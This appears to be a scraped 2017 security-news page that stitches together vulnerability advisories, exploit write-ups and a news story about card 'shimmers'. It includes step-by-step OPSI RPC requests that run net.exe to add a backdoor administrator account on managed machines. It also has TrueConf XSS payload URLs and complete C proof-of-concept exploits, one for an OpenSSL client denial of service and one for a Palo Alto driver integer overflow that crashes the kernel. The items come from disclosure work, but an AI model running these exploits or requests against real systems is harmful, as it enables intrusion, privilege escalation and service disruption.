VMware Releases Security Updates

Original release date: January 31, 2017

VMware has released security updates to address vulnerabilities in Airwatch Agent, Airwatch Console, and AirWatch Inbox software. Exploitation of one of these vulnerabilities could allow a remote attacker to take control of an affected system.

Users and administrators are encouraged to review VMware Security Advisory VMSA-2017-0001 and apply the necessary updates.


This product is provided subject to this Notification and this Privacy & Use policy.

BINOM3 Electric Power Quality Meter

CVSS v3 10

ATTENTION: Remotely exploitable/low skill level to exploit

Vendor: BINOM3

Equipment: Electric Power Quality Meter

Vulnerabilities: Cross-site scripting, access control issues, cross-site request forgery (CSRF), sensitive information stored in clear-text, and weak credentials management.

AFFECTED PRODUCTS

The following BINOM3 power meters are affected:

  • Universal multifunctional electric power quality meter.

IMPACT

Successful exploitation of these vulnerabilities could cause the device to inaccurately report a range of electrical quality measurements.

MITIGATION

BINOM3 has not created mitigations for these vulnerabilities.

NCCIC/ICS-CERT recommends that users take defensive measures to minimize the risk of exploitation of these vulnerabilities. Specifically, users should:

  • Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.
  • Locate control system networks and remote devices behind firewalls, and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

ICS-CERT reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.

ICS-CERT also provides a section for control systems security recommended practices on the ICS-CERT web page. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.

Additional mitigation guidance and recommended practices are publicly available in the ICS‑CERT Technical Information Paper, ICS-TIP-12-146-01B–Targeted Cyber Intrusion Detection and Mitigation Strategies, that is available for download from the ICS-CERT web site.

Organizations observing any suspected malicious activity should follow their established internal procedures and report their findings to ICS-CERT for tracking and correlation against other incidents.

In addition, ICS-CERT recommends that users take the following measures to protect themselves from social engineering attacks:

  1. Do not click web links or open unsolicited attachments in email messages.
  2. Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams.
  3. Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks.

No known public exploits specifically target these vulnerabilities.

VULNERABILITY OVERVIEW

Input sent from a malicious client is not properly verified by the server. An attacker can execute arbitrary script code in another user’s browser session.

CVE-2017-5164 has been assigned to this vulnerability. A CVSS v3 base score of 8.8 has been assigned; the CVSS vector string is (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:H).

Lack of authentication for remote service gives access to application set up and configuration.

CVE-2017-5162 has been assigned to this vulnerability. A CVSS v3 base score of 10 has been assigned; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H).

There is no CSRF Token generated per page and/or per (sensitive) function. Successful exploitation of this vulnerability can allow silent execution of unauthorized actions on the device such as configuration parameter changes, and saving modified configuration.

CVE-2017-5165 has been assigned to this vulnerability. A CVSS v3 base score of 8.8 has been assigned; the CVSS vector string is (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:H).

This flaw can be used to gain privileged access to the device.

CVE-2017-5166 has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been assigned; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

Users do not have any option to change their own passwords.

CVE-2017-5167 has been assigned to this vulnerability. A CVSS v3 base score of 8.6 has been assigned; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L).

RESEARCHER

Karn Ganeshen reported these vulnerabilities.

BACKGROUND

Critical Infrastructure Sector(s): Energy

Countries Deployed: Russia

Company Headquarters Location: St Petersburg, Russia

Ecava IntegraXor

CVSS v3 7.3

ATTENTION: Remotely Exploitable/low skill level to exploit

Vendor: Ecava

Equipment: IntegraXor

Vulnerability: SQL Injection

AFFECTED PRODUCTS

The following IntegraXor version is affected:

  • IntegraXor Version 5.0.413.0

IMPACT

A successful exploit of this vulnerability could lead to arbitrary data leakage, data manipulation, and remote code execution.

MITIGATION

Ecava provides software update V5.2.722.2 for IntegraXor, which fixes this vulnerability and recommends users update to the new version. The update can be found here:

https://www.integraxor.com/download-scada/

NCCIC/ICS-CERT recommends that users take defensive measures to minimize the risk of exploitation of this vulnerability. Specifically, users should:

  • Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.
  • Locate control system networks and remote devices behind firewalls, and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

ICS-CERT reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.

ICS-CERT also provides a section for control systems security recommended practices on the ICS-CERT web page. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.

Additional mitigation guidance and recommended practices are publicly available in the ICS‑CERT Technical Information Paper, ICS-TIP-12-146-01B–Targeted Cyber Intrusion Detection and Mitigation Strategies, that is available for download from the ICS-CERT web site.

Organizations observing any suspected malicious activity should follow their established internal procedures and report their findings to ICS-CERT for tracking and correlation against other incidents.

No known public exploits specifically target this vulnerability.

VULNERABILITY OVERVIEW

The Ecava IntegraXor web server has parameters that are vulnerable to SQL injection. If the queries are not sanitized, the host’s database could be subject to read, write, and delete commands.

CVE-2016-8341 has been assigned to this vulnerability. A CVSS v3 base score of 7.3 has been assigned; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L).

RESEARCHER

Independent researchers Brian Gorenc and Juan Pablo Lopez working with Trend Micro’s Zero Day Initiative have identified the SQL injection vulnerability.

BACKGROUND

Critical Infrastructure Sector(s): Critical Manufacturing, Energy, Water and Wastewater Systems, Transportation Systems

Countries Deployed: United Kingdom, United States, Australia, Poland, Canada, Estonia

Company Headquarters Location: Malaysia

OPSI Managed Client Remote Command Execution

Affected Products
Tested with
OPSI Server 4.0.7.26
OPSI ClientAgent 4.0.7.10-1
(older releases have not been tested)
According to the vendor all server instances that use a python-opsi version lower
than 4.0.7.28-4 are affected

References
https://www.secuvera.de/advisories/secuvera-SA-2017-01.txt (used for updates)
https://sourceforge.net/p/opsi/mailman/message/35609086/ (announcement by vendor
in german language)
No CVE-Number has been assigned yet.

Summary:
“opsi is an open source client management system for Windows and Linux
clients and is based on Linux servers” (http://uib.de/en/opsi/about-opsi/)
The default access control list (ACL) configuration of the OPSI-Server
shipped with the product prior to Version 4.0.7.28-4 is unsafe so that environ-
ments using this liberal ACL are vulnerable against remote command execution and
as a result vulnerable against privilege escalation.

Effect:
A remote attacker with knowledge of a single machine name and the correspon-
ding OPSI machine key is able to execute arbitrary commands on any OPSI-
Managed client in the same managed environment by using the Remote Procedure
Call (RPC) Interface of the OPSI-Server.
The attacker is able to use the SYSTEM privileges of the OPSI Agent on any
managed client computer and execute arbitrary commands leading to an elevation
of privileges.

Example:
In this example scenario the attacker has or gained local administrative
rights to one client computer managed by the OPSI-Client-Agent (e. g. a de-
veloper that is in need of local administrative rights on his machine).
The OPSI Server opsiconfd has the options “verify ip” set to “yes” and
“update ip” set to “no”. In the course of testing we figured out that these
settings have no effect at all.
With the following steps he is able to gain administrative control over any
other PC that is managed by the same OPSI Server instance.

1) Get the own machine name and the corresponding machine key:
Open
%programfiles(x86)%\opsi.org\opsi-client-agent\opsiclientd\/
opsiclientd.conf
and extract the values for the following params: host_id, opsi_host_key,
url (of the config service)

In this scenario the host_id is pc1.test-network.lan.

2) Issue the following HTTP-Request to get a list of machines managed by OPSI:
POST /rpc HTTP/1.1
Host: :4447
Content-Length: 136
Accept-Encoding: deflate, gzip
Accept: application/json, text/plain
content-type: application/json
Authorization: Basic <"host_id:opsi_host_key" coded in base64>
Connection: close

{“params”: [“*”, “”, “”, “”, “”, “”, “”, “”, “”], “id”: 2, “method”:
“getClientIds_list”, “Hostname”: “*”}

The Server responds with a list of managed systems.
E. g.
HTTP/1.1 200 OK
Content-Length: 1227
Set-Cookie: OPSISID=; path=/
Accept-Ranges: bytes
Server: Twisted/16.0.0 TwistedWeb/[OPSI.web2, version 0.2.0]
Date:
Content-Type: gzip-application/json;charset=utf-8
Connection: close

{“id”: 2, “result”: [“pc1.test-network.lan”, “pc2.test-network.lan”,
“domaincontroller.test-network.lan”], “error”: null}

3) pick a pc that is not the machine that is originating this request.
In this example we will use “domaincontroller.test-network.lan”.

4) Issue a request that adds a new user account “JohnConnor” with the Password
“R3sitanceIs4live”:
POST /rpc HTTP/1.1
Host: :4447
Content-Length: 136
Accept-Encoding: deflate, gzip
Accept: application/json, text/plain
content-type: application/json
Authorization: Basic <"host_id:opsi_host_key" coded in base64>
Connection: close

{“params”: [“C:\\Windows\\System32\\net.exe user /add JohnConnor
R3sitanceIs4live”, “domaincontroller.test-network.lan”], “id”: 2,
“method”: “hostControlSafe_execute”}

5) Move the newly created user to the local administrative group:
POST /rpc HTTP/1.1
Host: :4447
Content-Length: 136
Accept-Encoding: deflate, gzip
Accept: application/json, text/plain
content-type: application/json
Authorization: Basic <"host_id:opsi_host_key" coded in base64>
Connection: close

{“params”: [“C:\\Windows\\System32\\net.exe localgroup Administrators
JohnConnor /add”, “domaincontroller.test-network.lan”], “id”: 2,
“method”: “hostControlSafe_execute”}

6) Login to domaincontroller.test-network.lan via RDP or if you like: repeat steps
4 and 5 for every managed client to gain access on them.

Solution:
Update to OPSI Server to Version 4.0.7.28-4 or higher. Make use of the supplied
default acl.conf.

Disclosure Timeline:
2017/01/09 problem was found during a penetration test
2017/01/09 vendor contacted via email to [email protected] and [email protected]
2017/01/10 initial vendor response from [email protected] submitting responsible
contact details
2017/01/10 submitted advisory to responsible contact
2017/01/10 vendor acknowledged problem and sent a fix. Proposed updating access-
control-lists shipped with product
2017/01/10 supplied fix was verified solving the problem
2017/01/12 vendor supplied a more strict version of the fix and details about
how and when they inform their users
2017/01/13 vendor supplied a fix for “verify ip” issue
2017/01/17 vendor publicly announced the fix for ACL and verify ip setting
2017/01/30 advisory disclosure

Credits
Simon Bieber, secuvera GmbH
[email protected]
https://www.secuvera.de

Thanks to:
Tobias Glemser & Sven Supper, secuvera GmbH
and
Niko Wenselowski, uib GmbH
for their support.

Disclaimer:
All information is provided without warranty. The intent is to provide informa-
tion to secure infrastructure and/or systems, not to be able to attack or damage.
Therefore secuvera shall not be liable for any direct or indirect damages that
might be caused by using this information.

TrueConf Server 4.3.7 Cross Site Scripting / Open Redirect / CSRF

TrueConf Server v4.3.7 Multiple Remote Web Vulnerabilities

Vendor: TrueConf LLC
Product web page: https://www.trueconf.com
Affected version: 4.3.7.12255 and 4.3.7.12219

Summary: TrueConf Server is a powerful, high-quality and highly secured
video conferencing software server. It is specially designed to work with
up to 250 participants in a multipoint conference over LAN or VPN networks.
TrueConf Server requires no hardware and includes client applications for
all popular platforms, making it an easy-to-set up, unified communications
solution.

Desc: The administration interface allows users to perform certain actions
via HTTP requests without performing any validity checks to verify the requests.
This can be exploited to perform certain actions with administrative privileges
if a logged-in user visits a malicious web site.

Input passed via the ‘redirect_url’ GET parameter is not properly verified before
being used to redirect users. This can be exploited to redirect a user to an
arbitrary website e.g. when a user clicks a specially crafted link to the affected
script hosted on a trusted domain.

TrueConf also suffers from multiple stored, reflected and DOM XSS issues when
input passed via several parameters to several scripts is not properly sanitized
before being returned to the user. This can be exploited to execute arbitrary HTML
and script code in a user’s browser session in context of an affected site.

Tested on: Microsoft Windows 7 Professional SP1 (EN)
Apache/2.4.17 (Win32)
PHP/5.4.41

Vulnerability discovered by Gjoko ‘LiquidWorm’ Krstic
@zeroscience

Advisory ID: ZSL-2017-5393
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5393.php

01.11.2016

CSRF Stored XSS:
—————-


















Reflected XSS:
————–

http://127.0.0.1:8888/admin/conferences/get-all-status/?keys[]=
http://127.0.0.1:8888/admin/conferences/list/?sort=status%26’%22()%26%25

prompt(251)
http://127.0.0.1:8888/admin/group/list/?checked_group_id=0001&sort=name
http://127.0.0.1:8888/admin/group/list/?checked_group_id=’ onmouseover=confirm(251) ?

DOM XSS:
——–

http://127.0.0.1:8888/admin/group?’\>
http://127.0.0.1:8888/admin/conferences/list/?domxss=javascript:domxssExecutionSink(1,”‘\”>

Open Redirect:
————–

Request:

GET /admin/general/change-lang?lang_on=en&redirect_url=http://www.zeroscience.mk HTTP/1.1
Host: 127.0.0.1:8888
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

Response:

HTTP/1.1 302 Found
Date: Thu, 22 Sep 2016 21:15:40 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: http://www.zeroscience.mk
Content-Length: 0
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

CSRF Stop Web Service:
———————-




Sophos Web Appliance 4.2.1.3 Remote Command Injection

Critical Start security expert Russell Sanford discovered and reported two critical zero-day vulnerabilities in the Sophos Web Appliance in December of 2016. The vulnerabilities, documented under CVE-2016-9553, allow the remote compromise of the appliance’s underlining Linux subsystem. The vulnerabilities have now been patched in the January 2017 4.3.1 release of the appliance line.

Here is a summary of the two vulnerabilities documented under CVE-2016-9553.

CVE ID
CVE-2016-9553
Vulnerability Details
The Sophos Web Appliance (version 4.2.1.3) is vulnerable to two Remote Command Injection vulnerabilities affecting its web administrative interface. These vulnerabilities occur in the MgrReport.php (/controllers/MgrReport.php) component responsible for blocking and unblocking IP addresses that are able to access appliance.
The device doesn’t properly escape the information passed in the variables ‘unblockip’ and ‘blockip’ before calling the shell_exec() function which allows for system commands to be injected into the device.
The page that contains the vulnerabilities, /controllers/MgrReport.php, is accessed by a number of the machine’s built in commands in administrative interface. The pages that call to the vulnerable page (passed in the ‘&c=’ parameter) are: ‘report’, ‘trend_volume’, ‘trend_suspect’,’top_app_ctrl’, ‘perf_latency’, ‘perf_throughput’, ‘users_browse_summary’, ‘traf_sites’, ‘traf_blocked’, ‘traf_users’, ‘users_virus_downloaders’, ‘users_pua_downloaders’, ‘users_highrisk’, ‘users_policy_violators’, ‘users_top_users_by_browse_time’, ‘users_quota’, ‘users_browse_time_by_user’, ‘users_top_users_by_category’, ‘users_site_visits_by_user’, ‘users_category_visits_by_user’, ‘users_monitored_search_queries’, ‘users_app_ctrl’, ‘traf_category’, ‘traf_download’, and ‘warned_sites’.
Exploitation of this vulnerability yields shell access to the remote machine under the system account ‘spiderman’.
Vendor Response
Sophos has issued an update to correct this vulnerability. More details can be found at:

http://swa.sophos.com/rn/swa/concepts/ReleaseNotes_4.3.1.html

Credit
This vulnerability was discovered by Russell Sanford of Critical Start.
CVSS Score
CVSS Base Score: 8.5

CVSS v2 Vector: (AV:N/AC:M/Au:S/C:C/I:C/A:C/E:F/RL:OF/RC:C/CDP:ND/TD:ND/CR:H/IR:H/AR:ND)

Affected Vendors
Sophos

Affected Products
Web Appliance before version 4.3.1.3

Disclosure Timeline
2016-11-12 – Vulnerability discovered in audit
2016-11-13 – POC exploit created
2016-11-19 – Contacted MITRE for CVE
2016-11-22 – CVE-2016-9553 assigned
2016-11-29 – Sophos Contacted through Bugcrowd to coordinate fix
2017-01-20 – Sophos patched bug in Version 4.3.1 (Work Order# NSWA-1258)
2017-01-20 – Coordinated public release of advisory
2017-01-28 – CVE-2016-9553 publicly released.

About Critical Start
Critical Start is an employee owned cybersecurity company with the goal to improve the security capability of our clients using a strategy based methodology known as the Defendable Network. We provide security consulting services, PCI QSA services, product fulfillment, and Managed Security Services.

To schedule an appointment to discuss a cybersecurity assessment or penetration test with our team members, please call 214-810-6760 or email [email protected].

WordPress User Access Manager 1.2.6.7 Cross Site Scripting

————————————————————————
Persistent Cross-Site Scripting vulnerability in User Access Manager
WordPress Plugin
————————————————————————
Burak Kelebek, July 2016

————————————————————————
Abstract
————————————————————————
A persistent Cross-Site Scripting vulnerability has been encountered in
the User Access Manager WordPress Plugin. This issue allows an attacker
to perform a wide variety of actions, such as stealing Administrators’
session tokens, or performing arbitrary actions on their behalf. In
order to exploit this issue, the attacker has to lure/force a logged on
WordPress Administrator into opening a malicious website.

————————————————————————
OVE ID
————————————————————————
OVE-20160712-0025

————————————————————————
Tested versions
————————————————————————
This issue was successfully tested on the User Access Manager WordPress
Plugin version 1.2.6.7.

————————————————————————
Fix
————————————————————————
This issue is resolved in User Access Manager version 1.2.14.

————————————————————————
Details
————————————————————————
https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_vulnerability_in_user_access_manager_wordpress_plugin.html

Persistent Cross-Site Scripting was found in admin panel ‘manage’ page of User Access Manager. Multiple parameters in POST uam_usergroup are affected due to insufficient output encoding. This issue allows an attacker to perform a wide variety of actions, such as stealing Administrators’ session tokens, or performing arbitrary actions on their behalf. In order to exploit this issue, the attacker has to lure/force a logged on WordPress Administrator into opening a malicious website.

Proof of concept
























————————————————————————
Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its
goal is to contribute to the security of popular, widely used OSS
projects in a fun and educational way.

OpenSSL 1.1.0 Remote Client Denial Of Service

// Source: https://guidovranken.wordpress.com/2017/01/26/cve-2017-3730-openssl-1-1-0-remote-client-denial-of-service-affects-servers-as-well-poc/

/*
* SSL server demonstration program
*
* Copyright (C) 2006-2015, ARM Limited, All Rights Reserved
* SPDX-License-Identifier: Apache-2.0
*
* Licensed under the Apache License, Version 2.0 (the “License”); you may
* not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an “AS IS” BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*
* This file is part of mbed TLS (https://tls.mbed.org)
*/

/* Taken from mbed TLS programs/ssl/ssl_server.c and modified to crash postfix.
* Belongs to https://github.com/guidovranken/CVE-2017-3730
*/
#include
#include

#include “mbedtls/entropy.h”
#include “mbedtls/ctr_drbg.h”
#include “mbedtls/certs.h”
#include “mbedtls/x509.h”
#include “mbedtls/ssl.h”
#include “mbedtls/net_sockets.h”
#include “mbedtls/error.h”
#include “mbedtls/debug.h”

static int write_and_get_response( mbedtls_net_context *sock_fd, char *buf, size_t len )
{
int ret;

if ( (ret = mbedtls_net_send( sock_fd, (unsigned char*)buf, strlen(buf) )) <= 0 )
{
return -1;
}

memset( buf, 0, len );
ret = mbedtls_net_recv( sock_fd, (unsigned char*)buf, len );
return ret;
}

int main( void )
{
int ret;
mbedtls_net_context listen_fd, client_fd;
char buf[1024];
const char *pers = “ssl_server”;

int force_ciphersuite[2];
mbedtls_entropy_context entropy;
mbedtls_ctr_drbg_context ctr_drbg;
mbedtls_ssl_context ssl;
mbedtls_ssl_config conf;
mbedtls_x509_crt srvcert;
mbedtls_pk_context pkey;

mbedtls_net_init( &listen_fd );
mbedtls_net_init( &client_fd );
mbedtls_ssl_init( &ssl );
mbedtls_ssl_config_init( &conf );
mbedtls_x509_crt_init( &srvcert );
mbedtls_pk_init( &pkey );
mbedtls_entropy_init( &entropy );
mbedtls_ctr_drbg_init( &ctr_drbg );

ret = mbedtls_x509_crt_parse( &srvcert, (const unsigned char *) mbedtls_test_srv_crt,
mbedtls_test_srv_crt_len );
if( ret != 0 )
{
goto exit;
}

ret = mbedtls_x509_crt_parse( &srvcert, (const unsigned char *) mbedtls_test_cas_pem,
mbedtls_test_cas_pem_len );
if( ret != 0 )
{
goto exit;
}

ret = mbedtls_pk_parse_key( &pkey, (const unsigned char *) mbedtls_test_srv_key,
mbedtls_test_srv_key_len, NULL, 0 );
if( ret != 0 )
{
goto exit;
}

if( ( ret = mbedtls_net_bind( &listen_fd, NULL, “8888”, MBEDTLS_NET_PROTO_TCP ) ) != 0 )
{
goto exit;
}

if( ( ret = mbedtls_ctr_drbg_seed( &ctr_drbg, mbedtls_entropy_func, &entropy,
(const unsigned char *) pers,
strlen( pers ) ) ) != 0 )
{
goto exit;
}

if( ( ret = mbedtls_ssl_config_defaults( &conf,
MBEDTLS_SSL_IS_SERVER,
MBEDTLS_SSL_TRANSPORT_STREAM,
MBEDTLS_SSL_PRESET_DEFAULT ) ) != 0 )
{
goto exit;
}

mbedtls_ssl_conf_rng( &conf, mbedtls_ctr_drbg_random, &ctr_drbg );

mbedtls_ssl_conf_ca_chain( &conf, srvcert.next, NULL );
if( ( ret = mbedtls_ssl_conf_own_cert( &conf, &srvcert, &pkey ) ) != 0 )
{
goto exit;
}

force_ciphersuite[0] = mbedtls_ssl_get_ciphersuite_id( “TLS-DHE-RSA-WITH-AES-256-GCM-SHA384” );
force_ciphersuite[1] = 0;
mbedtls_ssl_conf_ciphersuites( &conf, force_ciphersuite );

if( ( ret = mbedtls_ssl_setup( &ssl, &conf ) ) != 0 )
{
goto exit;
}

reset:

mbedtls_net_free( &client_fd );

mbedtls_ssl_session_reset( &ssl );

if( ( ret = mbedtls_net_accept( &listen_fd, &client_fd,
NULL, 0, NULL ) ) != 0 )
{
goto exit;
}

sprintf(buf, “220 ok\n”);
ret = write_and_get_response( &client_fd, buf, sizeof(buf));

if ( ret < 5 ) {
goto exit;
}

if ( strncmp(buf, “EHLO “, 5) != 0 ) {
goto exit;
}

sprintf(buf, “250-SIZE 157286400\n250-8BITMIME\n250-STARTTLS\n250-ENHANCEDSTATUSCODES\n250-PIPELINING\n250-CHUNKING\n250 SMTPUTF8\n”);
ret = write_and_get_response( &client_fd, buf, sizeof(buf));

if ( ret < 8 ) {
goto exit;
}

if ( strncmp(buf, “STARTTLS”, 8) != 0 ) {
goto exit;
}
sprintf(buf, “220 ok\n”);
ret = mbedtls_net_send( &client_fd, (unsigned char*)buf, strlen(buf) );
if ( ret < 0 ) {
goto exit;
}

mbedtls_ssl_set_bio( &ssl, &client_fd, mbedtls_net_send, mbedtls_net_recv, NULL );

while( ( ret = mbedtls_ssl_handshake( &ssl ) ) != 0 )
{
if( ret != MBEDTLS_ERR_SSL_WANT_READ && ret != MBEDTLS_ERR_SSL_WANT_WRITE )
{
goto reset;
}
}

while( ( ret = mbedtls_ssl_close_notify( &ssl ) ) < 0 )
{
if( ret != MBEDTLS_ERR_SSL_WANT_READ &&
ret != MBEDTLS_ERR_SSL_WANT_WRITE )
{
goto reset;
}
}

ret = 0;
goto reset;

exit:

mbedtls_net_free( &client_fd );
mbedtls_net_free( &listen_fd );

mbedtls_x509_crt_free( &srvcert );
mbedtls_pk_free( &pkey );
mbedtls_ssl_free( &ssl );
mbedtls_ssl_config_free( &conf );
mbedtls_ctr_drbg_free( &ctr_drbg );
mbedtls_entropy_free( &entropy );

return( ret );
}

Palo Alto Networks Terminal Services Agent 7.0.3-13 Integer Overflow

/*

Exploit Title – Palo Alto Networks Terminal Services Agent Integer Overflow
Date – 26th January 2017
Discovered by – Parvez Anwar (@parvezghh)
Vendor Homepage – https://www.paloaltonetworks.com/
Tested Version – 7.0.3-13
Driver Version – 6.0.7.0 – panta.sys
Tested on OS – 32bit Windows 7 SP1
CVE ID – CVE-2017-5329
Vendor fix url – https://securityadvisories.paloaltonetworks.com/
https://securityadvisories.paloaltonetworks.com/Home/Detail/71
Fixed Version – 7.0.7 and later
Fixed driver ver – 6.0.8.0

Disassembly
———–

.text:9A26F0BD loc_9A26F0BD:
.text:9A26F0BD mov ecx, DeviceObject
.text:9A26F0C3 mov dword ptr [ecx+1ACh], 0
.text:9A26F0CD mov edx, DeviceObject
.text:9A26F0D3 mov eax, [edx+1B8h] ; eax points to our inputted buffer
.text:9A26F0D9 mov ecx, [eax+14h] ; Takes size to allocate from our inputted buffer 0x04924925
.text:9A26F0DC imul ecx, 38h ; 0x38 * 0x04924925 = 0x100000018. Wraps round becoming size to allocate 0x18 (Integer Overflow)
.text:9A26F0DF mov [ebp+NumberOfBytes], ecx ; Copy ecx value 0x18 onto stack
.text:9A26F0E2 push 44415450h ; Tag (PTAD string used)
.text:9A26F0E7 mov edx, [ebp+NumberOfBytes] ; Copy size 0x18 to edx
.text:9A26F0EA push edx ; NumberOfBytes
.text:9A26F0EB push 0 ; PoolType
.text:9A26F0ED call ds:ExAllocatePoolWithTag ; If returned null (eax) exits with error cleanly else takes crash path
.text:9A26F0F3 mov ecx, DeviceObject
.text:9A26F0F9 mov [ecx+1B0h], eax
.text:9A26F0FF mov edx, DeviceObject
.text:9A26F105 cmp dword ptr [edx+1B0h], 0 ; Checks return value. If not null then jumps to our crash path
.text:9A26F10C jnz short loc_9A26F13C ; Exits with error cleanly if incorrect size value but not crashable value

.text:9A26F13C
.text:9A26F13C loc_9A26F13C:
.text:9A26F13C mov ecx, [ebp+NumberOfBytes]
.text:9A26F13F push ecx ; 0x18 our allocated pool memory
.text:9A26F140 push 0 ; int, sets allocated memory to 0x00
.text:9A26F142 mov edx, DeviceObject
.text:9A26F148 mov eax, [edx+1B0h]
.text:9A26F14E push eax ; Pointer to our allocated buffer
.text:9A26F14F call memset
.text:9A26F154 add esp, 0Ch
.text:9A26F157 mov [ebp+var_4], 0 ; Null out ebp-4
.text:9A26F15E jmp short loc_9A26F169

.text:9A26F160 loc_9A26F160:
.text:9A26F160 mov ecx, [ebp+var_4]
.text:9A26F163 add ecx, 1 ; Increment counter
.text:9A26F166 mov [ebp+var_4], ecx ; Store counter value

.text:9A26F169 loc_9A26F169:
.text:9A26F169 mov edx, DeviceObject
.text:9A26F16F mov eax, [edx+1B8h] ; eax points to our inputted buffer
.text:9A26F175 mov ecx, [ebp+var_4] ; Loop counter number
.text:9A26F178 cmp ecx, [eax+14h] ; Compares our inputted buffer size 0x04924925. Here our
; size is not using the wrapped value so loops till BSOD
.text:9A26F17B jnb short loc_9A26F19A
.text:9A26F17D mov edx, [ebp+var_4] ; Counter value
.text:9A26F180 imul edx, 38h
.text:9A26F183 mov eax, DeviceObject
.text:9A26F188 mov ecx, [eax+1B0h] ; Pointer to allocated pool copied to ecx
.text:9A26F18E lea edx, [ecx+edx+30h] ; pointer+size(0x38*edx)+0x30
.text:9A26F192 push edx
.text:9A26F193 call sub_9A26C000 ; Starts overwriting other pool allocations !!!
.text:9A26F198 jmp short loc_9A26F160

.text:9A26C000 sub_9A26C000 proc near
.text:9A26C000
.text:9A26C000
.text:9A26C000 arg_0 = dword ptr 8
.text:9A26C000
.text:9A26C000 push ebp
.text:9A26C001 mov ebp, esp
.text:9A26C003 mov eax, [ebp+arg_0] ; Copy allocated buffer pointer (pointer+size(0x38*edx)+0x30) to eax
.text:9A26C006 mov ecx, [ebp+arg_0] ; Copy allocated buffer pointer (pointer+size(0x38*edx)+0x30) to ecx
.text:9A26C009 mov [eax+4], ecx ; Store pointer in allocated buffer at pointer+size(0x38*edx)+0x30+4
.text:9A26C00C mov edx, [ebp+arg_0] ; Copy allocated buffer pointer+size(0x38*edx)+0x30 to edx
.text:9A26C00F mov eax, [ebp+arg_0] ; Copy allocated buffer pointer+size(0x38*edx)+0x30 to eax
.text:9A26C012 mov [edx], eax ; Store pointer in allocated buffer at pointer+size(0x38*edx)+0x30
.text:9A26C014 pop ebp
.text:9A26C015 retn 4
.text:9A26C015 sub_9A26C000 endp

*/

#include
#include

#define BUFSIZE 44

int main(int argc, char *argv[])
{
HANDLE hDevice;
char devhandle[MAX_PATH];
DWORD dwRetBytes = 0;
unsigned char buffer[BUFSIZE];

memset(buffer, 0x41, BUFSIZE);

printf(“\n[i] Size of total input buffer %d bytes”, BUFSIZE);

*(DWORD*)(buffer + 20) = 0x04924925;

sprintf(devhandle, “\\\\.\\%s”, “panta”);

hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);

if(hDevice == INVALID_HANDLE_VALUE)
{
printf(“\n[-] Failed to open device %s\n\n”, devhandle);
return -1;
}
else
{
printf(“\n[+] Open %s device successful”, devhandle);
}

printf(“\n[~] Press any key to continue . . .”);
getch();

DeviceIoControl(hDevice, 0x88002200, buffer, BUFSIZE, NULL, 0, &dwRetBytes, NULL);

printf(“\n”);
CloseHandle(hDevice);
return 0;
}

Move over skimmers, ‘shimmers’ are the newest tool for stealing credit card info – British Columbia

Move over skimmers, ‘shimmers’ are the newest tool for stealing credit card info – British Columbia – CBC News

Hard-to-detect shimmers represent a new and more devious way steal chip card information

Consumers and retailers be on guard: there’s a new and more devious way for fraudsters to steal your credit and debit card information.

“Shimmers” are the newest form of credit card skimmers, only smaller, more powerful and practically impossible to detect. And they’re popping up all over the place, says RCMP Cpl. Michael McLaughlin, who sounded the alarm after four shimmers were extracted from checkout card readers at a Coquitlam, B.C., retailer.

“Something this sophisticated, this organized and multi-jurisdictional has all the classic hallmarks of organized crime,” said McLaughlin.

Shimmer credit card skimming devicei.cbc.ca/1.3953439.1485453407!/fileImage/httpImage/image.jpg_gen/derivatives/original_460/shimmer-credit-card-skimming-device.jpg 460w, i.cbc.ca/1.3953439.1485453407!/fileImage/httpImage/image.jpg_gen/derivatives/original_620/shimmer-credit-card-skimming-device.jpg 620w, i.cbc.ca/1.3953439.1485453407!/fileImage/httpImage/image.jpg_gen/derivatives/original_940/shimmer-credit-card-skimming-device.jpg 940w” sizes=”(max-width:70em) 45vw, (max-width:50em) 100vw, 33vw” width=”100%” class=”” style=”max-width: 100%; margin: 0.5em auto; display: block; height: auto;”>

The shimmers retrieved from a Coquitlam retailer even had handy arrows to help a fraudster install them correctly. (Coquitlam RCMP)

